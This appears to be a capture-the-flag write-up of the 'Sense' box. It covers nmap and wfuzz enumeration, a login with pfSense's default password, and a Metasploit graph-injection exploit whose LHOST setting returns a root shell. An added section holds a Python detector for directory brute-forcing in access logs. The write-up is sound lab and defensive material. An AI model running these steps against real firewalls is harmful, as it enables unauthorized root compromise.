Sense was another box that you can smash out in the 10 minutes you might have spare. There was not much to be learnt from this one, as it was very straightforward.

Nmap scan

80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Did not follow redirect to
443/tcp open ssl/https?
|_ssl-date: TLS randomness does not represent time

Navigating to the webserver, we get shown a pfSense login page and not much else.

Wfuzz results

wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404,301
001197: C=200 9 L 40 W 271 Ch "changelog"
112347: C=200 6 L 12 W 106 Ch "system-users"

The changelog indicates the current version is vulnerable to something. system-users indicates that the usernames ‘rohit’ and ‘company-default’ exist. Trying the username rohit with the pfSense default password of ‘pfsense’ lets us in.
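From the defender's side, a wordlist run like the wfuzz one above is easy to spot in the web server's access log: one client, a flood of 404s, and a couple of 200s that show exactly which files leaked. The sketch below is an added example, not part of the original writeup; it assumes lighttpd's default access-log layout, and the log lines, IP addresses, host name and request paths are constructed.

```python
import re
from collections import defaultdict

# Assumed layout (lighttpd default access log):
# host vhost user [time] "request" status bytes "referer" "user-agent"
LINE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_enumeration(lines, min_misses=20, max_hit_ratio=0.2):
    """Return {source: [paths answered 200]} for clients that look like
    wordlist-driven content discovery: many 404s, very few hits."""
    misses = defaultdict(int)
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected layout
        if m["status"] == "404":
            misses[m["src"]] += 1
        elif m["status"] == "200":
            hits[m["src"]].append(m["path"])
    flagged = {}
    for src, n_miss in misses.items():
        total = n_miss + len(hits[src])
        if n_miss >= min_misses and len(hits[src]) / total <= max_hit_ratio:
            flagged[src] = sorted(set(hits[src]))  # what the scan found
    return flagged

def build_sample():
    """Constructed log: one scanning client and one ordinary admin browser."""
    fmt = ('{ip} fw.example - [01/Jan/2024:10:00:{s:02d} +0000] '
           '"GET {p} HTTP/1.1" {c} {b} "-" "{ua}"')
    rows = [fmt.format(ip="192.0.2.10", s=i, p=f"/word{i}", c=404, b=345, ua="scanner")
            for i in range(40)]
    rows += [fmt.format(ip="192.0.2.10", s=41, p=p, c=200, b=b, ua="scanner")
             for p, b in (("/changelog", 271), ("/system-users", 106))]
    rows += [fmt.format(ip="198.51.100.7", s=5, p=p, c=200, b=6000, ua="Mozilla/5.0")
             for p in ("/index.php", "/status.php")]
    rows.append(fmt.format(ip="198.51.100.7", s=6, p="/favicon.ico",
                           c=404, b=345, ua="Mozilla/5.0"))
    return rows

if __name__ == "__main__":
    for src, found in find_enumeration(build_sample()).items():
        print(src, "enumerated the web root and found:", found)
```

The paths returned for a flagged client are the first things to review and remove from the web root, since they are what the scan actually retrieved.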


Searching for an exploit for this platform returns a Metasploit module that fits our needs. Filling in the details we know, we can run the exploit.

msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST
msf exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
USERNAME => rohit
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST tun0
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit

The above exploit yields a root-level shell, so there's no need to escalate privileges.